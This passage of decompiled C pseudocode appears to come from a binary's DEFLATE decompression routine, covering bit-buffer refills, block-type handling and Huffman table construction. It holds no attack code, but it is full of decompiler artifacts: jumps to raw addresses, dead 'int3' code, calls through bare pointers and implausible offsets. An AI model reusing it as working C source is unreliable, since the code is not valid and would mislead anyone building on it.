																		if( *(_t2870 - 0x44) < 0) {
																			if( *(_t2870 - 8) <= 0xa) {
																				goto L452;
																			} else {
																				 *(_t2870 - 0x4c) = 0xa;
																				do {
																					_t2588 =  *(_t2870 + 8) + (_t1769 << 0) + 0x40;
																					_t1769 =  !( *(_t2870 - 0x44)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x4c) & 0x00000001);
																					 *(_t2870 - 0x44) =  *((short*)(_t2588 + 0x920 + _t1769 * 2));
																					 *(_t2870 - 0x4c) =  *(_t2870 - 0x4c) + 1;
																					if( *(_t2870 - 0x44) < 0) {
																						goto L449;
																					}
																					break;
																					L449:
																					_t1769 =  *(_t2870 - 0x4c) + 1;
																				} while ( *(_t2870 - 8) >= _t1769);
																				if( *(_t2870 - 0x44) < 0) {
																					goto L452;
																				} else {
																					goto L465;
																				}
																			}
																		} else {
																			 *(_t2870 - 0x4c) =  *(_t2870 - 0x44) >> 9;
																			if( *(_t2870 - 0x4c) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x4c)) {
																				L452:
																				_t2086 =  *(_t2870 - 4);
																				if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
																					 *(_t2870 - 0xd4) =  *( *(_t2870 - 4)) & 0x000000ff;
																					 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																					goto L463;
																				} else {
																					L453:
																					_t2465 =  *(_t2870 + 0x20) & 0x00000002;
																					if(_t2465 == 0) {
																						 *(_t2870 - 0xd4) = 0;
																						L461:
																						L463:
																						if(0 != 0) {
																							goto L452;
																						} else {
																							_t2566 =  *(_t2870 - 0xd4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																							 *(_t2870 - 0xc) = _t2566;
																							_t1769 =  *(_t2870 - 8) + 8;
																							 *(_t2870 - 8) = _t1769;
																							if( *(_t2870 - 8) < 0xf) {
																								goto L439;
																							} else {
																								goto L465;
																							}
																						}
																					} else {
																						L454:
																						 *(_t2870 - 0x1c) = 1;
																						_t1692 =  *(_t2870 + 8);
																						 *_t1692 = 0x1a;
																					}
																				}
																			} else {
																				L465:
																				goto L468;
																			}
																		}
																	}
																}
															} else {
																L421:
																if( *(_t2870 - 8) >=  *(_t2870 - 0x24)) {
																	L435:
																	goto 0x230c45;
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	 *(_t2870 - 0x124) = (_t2566 << _t2180) - 0x00000001 &  *(_t2870 - 0xc);
																	 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
																	_t2180 =  *(_t2870 - 8) -  *(_t2870 - 0x24);
																	 *(_t2870 - 8) = _t2180;
																	_t2566 = 0;
																	if(0 != 0) {
																		goto L421;
																	} else {
																		_t1769 =  *(_t2870 - 0x10) +  *(_t2870 - 0x124);
																		 *(_t2870 - 0x10) = _t1769;
																		goto L437;
																	}
																} else {
																	L422:
																	_t2086 =  *(_t2870 - 4);
																	if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
																		 *(_t2870 - 0xa4) =  *( *(_t2870 - 4)) & 0x000000ff;
																		 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																		goto L433;
																	} else {
																		L423:
																		_t2465 =  *(_t2870 + 0x20) & 0x00000002;
																		if(_t2465 == 0) {
																			 *(_t2870 - 0xa4) = 0;
																			L431:
																			L433:
																			if(0 != 0) {
																				goto L422;
																			} else {
																				_t2566 =  *(_t2870 - 0xa4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																				 *(_t2870 - 0xc) = _t2566;
																				 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																				_t2180 =  *(_t2870 - 8);
																				if(_t2180 <  *(_t2870 - 0x24)) {
																					goto L422;
																				} else {
																					goto L435;
																				}
																			}
																		} else {
																			L424:
																			 *(_t2870 - 0x1c) = 1;
																			_t1692 =  *(_t2870 + 8);
																			 *_t1692 = 0x19;
																		}
																	}
																}
															}
														} else {
															L531:
															_t1692 =  *( *(_t2870 + 8) + 0x14) & 0x00000001;
															if(_t1692 == 0) {
																L48:
																if( *(_t2870 - 8) >= 3) {
																	L62:
																	 *( *(_t2870 + 8) + 0x14) =  *(_t2870 - 0xc) & 0x00000007;
																	 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> 3;
																	 *(_t2870 - 8) =  *(_t2870 - 8) - 3;
																	if(0 != 0) {
																		goto L48;
																	} else {
																		 *( *(_t2870 + 8) + 0x18) =  *( *(_t2870 + 8) + 0x14) >> 1;
																		_t1692 =  *(_t2870 + 8);
																		if( *((intOrPtr*)(_t1692 + 0x18)) != 0) {
																			_t2086 =  *(_t2870 + 8);
																			if( *((intOrPtr*)(_t2086 + 0x18)) != 3) {
																				if( *( *(_t2870 + 8) + 0x18) != 1) {
																					 *(_t2870 - 0x10) = 0;
																					L189:
																					if( *(_t2870 - 0x10) >= 3) {
																						goto 0x230a5e;
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						_push( *(_t2870 + 8) + (_t1692 << 1) + 0x40);
																						_t1743 =  *( *0x00DD9D9D)();
																						_t2873 = _t2873 + 0xc;
																						 *(_t2870 - 0x10) = 0;
																						L210:
																						_t2136 =  *(_t2870 + 8);
																						if( *(_t2870 - 0x10) >=  *((intOrPtr*)(_t2136 + (_t1743 << 1) + 0x2c))) {
																							 *((intOrPtr*)( *(_t2870 + 8) + (_t2136 << 1) + 0x2c)) = 0x13;
																							goto L231;
																						} else {
																							L212:
																							if( *(_t2870 - 8) >= 3) {
																								L226:
																								 *(_t2870 - 0x114) =  *(_t2870 - 0xc) & 0x00000007;
																								_t1987 =  *(_t2870 - 0xc) >> 3;
																								 *(_t2870 - 0xc) = _t1987;
																								 *(_t2870 - 8) =  *(_t2870 - 8) - 3;
																								if(0 != 0) {
																									goto L212;
																								} else {
																									_t1743 =  *(_t2870 - 0x114);
																									 *( *(_t2870 + 8) + (_t1987 << 1) + 0x40 + ( *( *(_t2870 - 0x10) + 0x22ba14) & 0x000000ff)) = _t1743;
																									 *(_t2870 - 0x10) =  *(_t2870 - 0x10) + 1;
																									goto L210;
																								}
																							} else {
																								L213:
																								_t1692 =  *(_t2870 - 4);
																								if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
																									 *(_t2870 - 0xc0) =  *( *(_t2870 - 4)) & 0x000000ff;
																									 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																									goto L224;
																								} else {
																									L214:
																									_t2086 =  *(_t2870 + 0x20) & 0x00000002;
																									if(_t2086 == 0) {
																										 *(_t2870 - 0xc0) = 0;
																										L222:
																										L224:
																										if(0 != 0) {
																											goto L213;
																										} else {
																											 *(_t2870 - 0xc) =  *(_t2870 - 0xc0) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																											 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																											if( *(_t2870 - 8) < 3) {
																												goto L213;
																											} else {
																												goto L226;
																											}
																										}
																									} else {
																										L215:
																										 *(_t2870 - 0x1c) = 1;
																										_t2465 =  *(_t2870 + 8);
																										 *_t2465 = 0xe;
																									}
																								}
																							}
																						}
																					} else {
																						L190:
																						_t428 =  *(_t2870 - 0x10) + 0x22b010; // 0x7030200
																						if( *(_t2870 - 8) >=  *_t428) {
																							L204:
																							_t456 =  *(_t2870 - 0x10) + 0x22b010; // 0x7030200
																							 *( *(_t2870 + 8) + 0x2c +  *(_t2870 - 0x10) * 4) = (0x00000001 <<  *_t456) - 0x00000001 &  *(_t2870 - 0xc);
																							_t464 =  *(_t2870 - 0x10) + 0x22b010; // 0x7030200
																							 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *_t464;
																							_t468 =  *(_t2870 - 0x10) + 0x22b010; // 0x7030200
																							_t2759 =  *_t468;
																							_t2000 =  *(_t2870 - 8) - _t2759;
																							 *(_t2870 - 8) = _t2000;
																							if(0 != 0) {
																								goto L190;
																							} else {
																								goto 0x230a4a;
																								asm("int3");
																								_t1692 =  *(_t2870 - 0x10);
																								 *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t1692 * 4)) =  *((intOrPtr*)(_t2000 + 0x2c + _t2759 * 4)) +  *((intOrPtr*)(0x22ba28 +  *(_t2870 - 0x10) * 4));
																								 *(_t2870 - 0x10) =  *(_t2870 - 0x10) + 1;
																								goto L189;
																							}
																						} else {
																							L191:
																							_t2465 =  *(_t2870 - 4);
																							if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
																								 *(_t2870 - 0xe0) =  *( *(_t2870 - 4)) & 0x000000ff;
																								 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																								goto L202;
																							} else {
																								L192:
																								_t1692 =  *(_t2870 + 0x20) & 0x00000002;
																								if(_t1692 == 0) {
																									 *(_t2870 - 0xe0) = 0;
																									L200:
																									L202:
																									if(0 != 0) {
																										goto L191;
																									} else {
																										 *(_t2870 - 0xc) =  *(_t2870 - 0xe0) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																										 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																										_t453 =  *(_t2870 - 0x10) + 0x22b010; // 0x7030200
																										if( *(_t2870 - 8) <  *_t453) {
																											goto L191;
																										} else {
																											goto L204;
																										}
																									}
																								} else {
																									L193:
																									 *(_t2870 - 0x1c) = 1;
																									_t2086 =  *(_t2870 + 8);
																									 *_t2086 = 0xb;
																								}
																							}
																						}
																					}
																				} else {
																					 *(_t2870 - 0x60) =  *(_t2870 + 8) + 0x40 + _t1692 * 0;
																					 *((intOrPtr*)( *(_t2870 + 8) + 0x2c)) = 0x120;
																					 *( *(_t2870 + 8) + 0xbadbd9) = 0x20;
																					_push(0x20);
																					_push(5);
																					_push( *(_t2870 + 8) + 0xbadbed);
																					_t2086 =  *0x00DD9D9D;
																					 *_t2086();
																					_t2873 = _t2873 + 0xc;
																					 *(_t2870 - 0x5c) = 0;
																					while( *(_t2870 - 0x5c) <= 0x8f) {
																						 *( *(_t2870 - 0x60)) = 8;
																						_t2086 =  *(_t2870 - 0x60) + 1;
																						 *(_t2870 - 0x60) = _t2086;
																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
																					}
																					while( *(_t2870 - 0x5c) <= 0xff) {
																						 *( *(_t2870 - 0x60)) = 9;
																						_t2086 =  *(_t2870 - 0x60) + 1;
																						 *(_t2870 - 0x60) = _t2086;
																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
																					}
																					while( *(_t2870 - 0x5c) <= 0x117) {
																						 *( *(_t2870 - 0x60)) = 7;
																						_t2086 =  *(_t2870 - 0x60) + 1;
																						 *(_t2870 - 0x60) = _t2086;
																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
																					}
																					while( *(_t2870 - 0x5c) <= 0x11f) {
																						 *( *(_t2870 - 0x60)) = 8;
																						_t2086 =  *(_t2870 - 0x60) + 1;
																						 *(_t2870 - 0x60) = _t2086;
																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
																					}
																					L231:
																					L233:
																					if( *( *(_t2870 + 8) + 0x18) < 0) {
																						goto L350;
																					} else {
																						 *((intOrPtr*)(_t2870 - 0x68)) =  *(_t2870 + 8) + 0x40 +  *( *(_t2870 + 8) + 0x18) * 0xda0;
																						_push(0x40);
																						_push(0);
																						_push(_t2870 - 0x1a8);
																						 *( *0x00DD9D9D)();
																						_push(0x800);
																						_push(0);
																						_push( *((intOrPtr*)(_t2870 - 0x68)) + 0x120);
																						 *( *0x00DD9D9D)();
																						_push(0x480);
																						_push(0);
																						_push( *((intOrPtr*)(_t2870 - 0x68)) + 0x920);
																						 *( *0x00DD9D9D)();
																						_t2873 = _t2873 + 0x24;
																						 *(_t2870 - 0x64) = 0;
																						while( *(_t2870 - 0x64) <  *((intOrPtr*)( *(_t2870 + 8) + 0x2c +  *( *(_t2870 + 8) + 0x18) * 4))) {
																							 *((intOrPtr*)(_t2870 + ( *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x64)) & 0x000000ff) * 4 - 0x1a8)) =  *((intOrPtr*)(_t2870 + ( *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x64)) & 0x000000ff) * 4 - 0x1a8)) + 1;
																							 *(_t2870 - 0x64) =  *(_t2870 - 0x64) + 1;
																						}
																						 *(_t2870 - 0xd8) = 0;
																						 *(_t2870 - 0x9c) = 0;
																						_t1692 = 4 << 0;
																						 *(_t2870 + 0xfffffffffffffe9c) = 0;
																						_t2465 = 0;
																						 *(_t2870 + 0xfffffffffffffe98) = 0;
																						 *(_t2870 - 0x64) = 1;
																						while( *(_t2870 - 0x64) <= 0xf) {
																							 *(_t2870 - 0xd8) =  *(_t2870 - 0xd8) +  *((intOrPtr*)(_t2870 +  *(_t2870 - 0x64) * 4 - 0x1a8));
																							 *(_t2870 - 0x9c) =  *(_t2870 - 0x9c) +  *((intOrPtr*)(_t2870 +  *(_t2870 - 0x64) * 4 - 0x1a8)) << 1;
																							_t2465 =  *(_t2870 - 0x64);
																							 *(_t2870 + _t2465 * 4 - 0x164) =  *(_t2870 - 0x9c);
																							_t1692 =  *(_t2870 - 0x64) + 1;
																							 *(_t2870 - 0x64) = _t1692;
																						}
																						if( *(_t2870 - 0x9c) == 0x10000 ||  *(_t2870 - 0xd8) <= 1) {
																							 *(_t2870 - 0x78) = 0xffffffff;
																							 *(_t2870 - 0x80) = 0;
																							while(1) {
																								_t2666 =  *(_t2870 - 0x80);
																								if(_t2666 >=  *((intOrPtr*)( *(_t2870 + 8) + 0x2c +  *( *(_t2870 + 8) + 0x18) * 4))) {
																									break;
																								}
																								 *(_t2870 - 0x34) = 0;
																								 *(_t2870 - 0x74) =  *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x80)) & 0x000000ff;
																								if( *(_t2870 - 0x74) != 0) {
																									 *(_t2870 - 0xe8) =  *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168);
																									_t2719 =  *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168) + 1;
																									 *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168) = _t2719;
																									_t2331 =  *(_t2870 - 0x74);
																									 *(_t2870 - 0xc8) = _t2331;
																									while( *(_t2870 - 0xc8) > 0) {
																										_t2331 =  *(_t2870 - 0x34) << 0x00000001 |  *(_t2870 - 0xe8) & 0x00000001;
																										 *(_t2870 - 0x34) = _t2331;
																										_t2719 =  *(_t2870 - 0xc8) - 1;
																										 *(_t2870 - 0xc8) = _t2719;
																										 *(_t2870 - 0xe8) =  *(_t2870 - 0xe8) >> 1;
																									}
																									if( *(_t2870 - 0x74) > 0xa) {
																										 *(_t2870 - 0x6c) =  *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x120 + ( *(_t2870 - 0x34) & 0x000003ff) * 2));
																										if( *(_t2870 - 0x6c) == 0) {
																											 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x120 + ( *(_t2870 - 0x34) & 0x000003ff) * 2)) =  *(_t2870 - 0x78);
																											 *(_t2870 - 0x6c) =  *(_t2870 - 0x78);
																											 *(_t2870 - 0x78) =  *(_t2870 - 0x78) - 2;
																										}
																										 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 9;
																										 *(_t2870 - 0xd0) =  *(_t2870 - 0x74);
																										while( *(_t2870 - 0xd0) > 0xb) {
																											 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 1;
																											 *(_t2870 - 0x6c) =  *(_t2870 - 0x6c) - ( *(_t2870 - 0x34) & 0x00000001);
																											if( *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) != 0) {
																												 *(_t2870 - 0x6c) =  *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2));
																											} else {
																												 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) =  *(_t2870 - 0x78);
																												 *(_t2870 - 0x6c) =  *(_t2870 - 0x78);
																												 *(_t2870 - 0x78) =  *(_t2870 - 0x78) - 2;
																											}
																											 *(_t2870 - 0xd0) =  *(_t2870 - 0xd0) - 1;
																										}
																										 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 1;
																										 *(_t2870 - 0x6c) =  *(_t2870 - 0x6c) - ( *(_t2870 - 0x34) & 0x00000001);
																										 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) =  *(_t2870 - 0x80);
																									} else {
																										 *((short*)(_t2870 - 0xcc)) =  *(_t2870 - 0x74) << 0x00000009 |  *(_t2870 - 0x80);
																										while( *(_t2870 - 0x34) < 0x400) {
																											goto 0x230ab1;
																											asm("int3");
																											 *((short*)(_t2719 + 0x120 + _t2331 * 2)) =  *((intOrPtr*)(_t2870 - 0xcc));
																											_t2331 =  *(_t2870 - 0x74);
																											_t2719 = (1 << _t2331) +  *(_t2870 - 0x34);
																											 *(_t2870 - 0x34) = 1;
																										}
																									}
																									goto L248;
																								} else {
																									L248:
																									 *(_t2870 - 0x80) =  *(_t2870 - 0x80) + 1;
																									continue;
																								}
																								break;
																							}
																							if( *( *(_t2870 + 8) + 0x18) != 2) {
																								L349:
																								_t2086 =  *( *(_t2870 + 8) + 0x18) - 1;
																								 *( *(_t2870 + 8) + 0x18) = _t2086;
																								goto L233;
																							} else {
																								 *(_t2870 - 0x10) = 0;
																								L274:
																								_t2669 =  *(_t2870 + 8);
																								_t1900 =  *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t2666 * 0)) +  *((intOrPtr*)(_t2669 + 0x30));
																								if( *(_t2870 - 0x10) >= _t1900) {
																									_t2086 = 4 << 0;
																									_t2465 =  *(_t2870 + 8);
																									_t1903 =  *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t2669 * 0)) +  *((intOrPtr*)(_t2465 + 0x30));
																									if(_t1903 ==  *(_t2870 - 0x10)) {
																										_push( *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t1903 * 0)));
																										_push( *(_t2870 + 8) + 0x2924);
																										_push( *(_t2870 + 8) + 0x40);
																										 *((intOrPtr*)( *0x0022C1F0))();
																										_push( *( *(_t2870 + 8) + 0xbadbd9));
																										_push( *(_t2870 + 8) +  *((intOrPtr*)( *(_t2870 + 8) + 0x2c)) + 0x2924);
																										_push( *(_t2870 + 8) + 0xbadbed);
																										 *((intOrPtr*)( *((intOrPtr*)(0x22c1f0))))();
																										_t2873 = _t2873 + 0x18;
																										goto L349;
																									} else {
																										L344:
																										 *(_t2870 - 0x1c) = 0xffffffff;
																										_t1692 =  *(_t2870 + 8);
																										 *_t1692 = 0x15;
																									}
																								} else {
																									L276:
																									if( *(_t2870 - 8) >= 0xf) {
																										L307:
																										_t2296 =  *((short*)( *(_t2870 + 8) + (_t1900 << 1) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
																										 *(_t2870 - 0x40) = _t2296;
																										if( *(_t2870 - 0x40) < 0) {
																											 *(_t2870 - 0x48) = 0xa;
																											do {
																												 *(_t2870 - 0x40) =  *((short*)( *(_t2870 + 8) + (_t2296 << 1) + 0x40 + 0x920 + ( !( *(_t2870 - 0x40)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x48) & 0x00000001)) * 2));
																												_t2296 =  *(_t2870 - 0x48) + 1;
																												 *(_t2870 - 0x48) = _t2296;
																											} while ( *(_t2870 - 0x40) < 0);
																										} else {
																											 *(_t2870 - 0x48) =  *(_t2870 - 0x40) >> 9;
																											 *(_t2870 - 0x40) =  *(_t2870 - 0x40) & 0x000001ff;
																										}
																										 *(_t2870 - 0x28) =  *(_t2870 - 0x40);
																										_t1900 =  *(_t2870 - 0xc) >>  *(_t2870 - 0x48);
																										 *(_t2870 - 0xc) = _t1900;
																										_t2086 =  *(_t2870 - 8) -  *(_t2870 - 0x48);
																										 *(_t2870 - 8) = _t2086;
																										_t2465 = 0;
																										if(0 != 0) {
																											goto L276;
																										} else {
																											if( *(_t2870 - 0x28) >= 0x10) {
																												if( *(_t2870 - 0x28) != 0x10 ||  *(_t2870 - 0x10) != 0) {
																													_t1937 =  *(_t2870 - 0x28);
																													_t841 = _t1937 + 0x22b004; // 0x70302
																													_t2315 =  *_t841;
																													 *(_t2870 - 0x24) = _t2315;
																													L322:
																													if( *(_t2870 - 8) >=  *(_t2870 - 0x24)) {
																														L336:
																														goto 0x230b37;
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														 *(_t2870 - 0x8c) = (_t1937 << _t2315) - 0x00000001 &  *(_t2870 - 0xc);
																														 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
																														_t1937 =  *(_t2870 - 8) -  *(_t2870 - 0x24);
																														 *(_t2870 - 8) = _t1937;
																														_t2315 = 0;
																														if(0 != 0) {
																															goto L322;
																														} else {
																															 *(_t2870 - 0x8c) =  *((char*)( *(_t2870 - 0x28) + 0x22b008)) +  *(_t2870 - 0x8c);
																															if( *(_t2870 - 0x28) != 0x10) {
																																 *(_t2870 - 0x108) = 0;
																															} else {
																																 *(_t2870 - 0x108) =  *( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2923) & 0x000000ff;
																															}
																															_push( *(_t2870 - 0x8c));
																															_push( *(_t2870 - 0x108));
																															_push( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2924);
																															_t2666 = 4 << 0;
																															 *((intOrPtr*)( *0x0022C1F4))();
																															_t2873 = _t2873 + 0xc;
																															 *(_t2870 - 0x10) =  *(_t2870 - 0x10) +  *(_t2870 - 0x8c);
																															goto L274;
																														}
																													} else {
																														L323:
																														_t1692 =  *(_t2870 - 4);
																														if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
																															 *(_t2870 - 0xbc) =  *( *(_t2870 - 4)) & 0x000000ff;
																															 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																															goto L334;
																														} else {
																															L324:
																															_t2086 =  *(_t2870 + 0x20) & 0x00000002;
																															if(_t2086 == 0) {
																																 *(_t2870 - 0xbc) = 0;
																																L332:
																																L334:
																																if(0 != 0) {
																																	goto L323;
																																} else {
																																	_t1937 =  *(_t2870 - 0xbc) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																																	 *(_t2870 - 0xc) = _t1937;
																																	_t2315 =  *(_t2870 - 8) + 8;
																																	 *(_t2870 - 8) = _t2315;
																																	if( *(_t2870 - 8) <  *(_t2870 - 0x24)) {
																																		goto L323;
																																	} else {
																																		goto L336;
																																	}
																																}
																															} else {
																																L325:
																																 *(_t2870 - 0x1c) = 1;
																																_t2465 =  *(_t2870 + 8);
																																 *_t2465 = 0x12;
																															}
																														}
																													}
																												} else {
																													L318:
																													 *(_t2870 - 0x1c) = 0xffffffff;
																													_t1692 =  *(_t2870 + 8);
																													 *_t1692 = 0x11;
																												}
																											} else {
																												 *((char*)( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2924)) =  *(_t2870 - 0x28);
																												_t2666 =  *(_t2870 - 0x10) + 1;
																												 *(_t2870 - 0x10) = _t2666;
																												goto L274;
																											}
																										}
																									} else {
																										if( *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4) >= 2) {
																											_t1900 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
																											 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2086 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
																											 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
																											 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
																											goto L307;
																										} else {
																											L278:
																											_t2694 =  *((short*)( *(_t2870 + 8) + (_t2086 << 1) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
																											 *(_t2870 - 0x40) = _t2694;
																											if( *(_t2870 - 0x40) < 0) {
																												if( *(_t2870 - 8) <= 0xa) {
																													goto L291;
																												} else {
																													 *(_t2870 - 0x48) = 0xa;
																													do {
																														_t1900 =  !( *(_t2870 - 0x40)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x48) & 0x00000001);
																														 *(_t2870 - 0x40) =  *((short*)( *(_t2870 + 8) + (_t2694 << 1) + 0x40 + 0x920 + _t1900 * 2));
																														_t2694 =  *(_t2870 - 0x48) + 1;
																														 *(_t2870 - 0x48) = _t2694;
																														if( *(_t2870 - 0x40) < 0) {
																															goto L288;
																														}
																														break;
																														L288:
																														_t1900 =  *(_t2870 - 0x48) + 1;
																													} while ( *(_t2870 - 8) >= _t1900);
																													if( *(_t2870 - 0x40) < 0) {
																														goto L291;
																													} else {
																														goto L304;
																													}
																												}
																											} else {
																												_t1900 =  *(_t2870 - 0x40) >> 9;
																												 *(_t2870 - 0x48) = _t1900;
																												if( *(_t2870 - 0x48) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x48)) {
																													L291:
																													_t2086 =  *(_t2870 - 4);
																													if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
																														 *(_t2870 - 0xb4) =  *( *(_t2870 - 4)) & 0x000000ff;
																														 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																														goto L302;
																													} else {
																														L292:
																														_t2465 =  *(_t2870 + 0x20) & 0x00000002;
																														if(_t2465 == 0) {
																															 *(_t2870 - 0xb4) = 0;
																															L300:
																															L302:
																															if(0 != 0) {
																																goto L291;
																															} else {
																																_t2086 =  *(_t2870 - 8);
																																 *(_t2870 - 0xc) =  *(_t2870 - 0xb4) << _t2086 |  *(_t2870 - 0xc);
																																_t1900 =  *(_t2870 - 8) + 8;
																																 *(_t2870 - 8) = _t1900;
																																if( *(_t2870 - 8) < 0xf) {
																																	goto L278;
																																} else {
																																	goto L304;
																																}
																															}
																														} else {
																															L293:
																															 *(_t2870 - 0x1c) = 1;
																															_t1692 =  *(_t2870 + 8);
																															 *_t1692 = 0x10;
																														}
																													}
																												} else {
																													L304:
																													goto L307;
																												}
																											}
																										}
																									}
																								}
																							}
																						} else {
																							L244:
																							 *(_t2870 - 0x1c) = 0xffffffff;
																							_t2086 =  *(_t2870 + 8);
																							 *_t2086 = 0x23;
																						}
																					}
																				}
																			} else {
																				L165:
																				 *(_t2870 - 0x1c) = 0xffffffff;
																				_t2465 =  *(_t2870 + 8);
																				 *_t2465 = 0xa;
																			}
																		} else {
																			L64:
																			if( *(_t2870 - 8) >= ( *(_t2870 - 8) & 0x00000007)) {
																				L78:
																				 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> ( *(_t2870 - 8) & 0x00000007);
																				_t2018 =  *(_t2870 - 8) & 0x00000007;
																				 *(_t2870 - 8) =  *(_t2870 - 8) - _t2018;
																				if(0 != 0) {
																					goto L64;
																				} else {
																					 *(_t2870 - 0x10) = 0;
																					L81:
																					if( *(_t2870 - 0x10) >= 4) {
																						 *(_t2870 - 0x10) =  *( *(_t2870 + 8) + 0x2920 + _t2018 * 0) & 0x000000ff | ( *( *(_t2870 + 8) + 0xbb04cd) & 0x000000ff) << 0x00000008;
																						_t2465 =  *(_t2870 + 8);
																						_t1692 = ( *(_t2465 + 0x2923) & 0x000000ff) << 8;
																						if( *(_t2870 - 0x10) == (( *( *(_t2870 + 8) + 0xbb04cd) & 0x000000ff | _t1692) ^ 0x0000ffff)) {
																							L117:
																							if( *(_t2870 - 0x10) == 0 ||  *(_t2870 - 8) == 0) {
																								L139:
																								if( *(_t2870 - 0x10) == 0) {
																									goto L531;
																								} else {
																									L140:
																									_t1692 =  *(_t2870 - 0x14);
																									if(_t1692 <  *((intOrPtr*)(_t2870 - 0x70))) {
																										L144:
																										_t1692 =  *(_t2870 - 4);
																										if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
																											if( *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14) >=  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4)) {
																												 *((intOrPtr*)(_t2870 - 0x104)) =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
																											} else {
																												 *((intOrPtr*)(_t2870 - 0x104)) =  *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14);
																											}
																											if( *((intOrPtr*)(_t2870 - 0x104)) >=  *(_t2870 - 0x10)) {
																												 *(_t2870 - 0x100) =  *(_t2870 - 0x10);
																											} else {
																												if( *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14) >=  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4)) {
																													 *(_t2870 - 0xfc) =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
																												} else {
																													 *(_t2870 - 0xfc) =  *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14);
																												}
																												 *(_t2870 - 0x100) =  *(_t2870 - 0xfc);
																											}
																											 *(_t2870 - 0x94) =  *(_t2870 - 0x100);
																											_push( *(_t2870 - 0x94));
																											_push( *(_t2870 - 4));
																											_push( *(_t2870 - 0x14));
																											 *((intOrPtr*)( *((intOrPtr*)(0x22c1f0))))();
																											_t2873 = _t2873 + 0xc;
																											 *(_t2870 - 4) =  *(_t2870 - 4) +  *(_t2870 - 0x94);
																											_t2465 =  *(_t2870 - 0x14) +  *(_t2870 - 0x94);
																											 *(_t2870 - 0x14) = _t2465;
																											 *(_t2870 - 0x10) =  *(_t2870 - 0x10) -  *(_t2870 - 0x94);
																											goto L139;
																										} else {
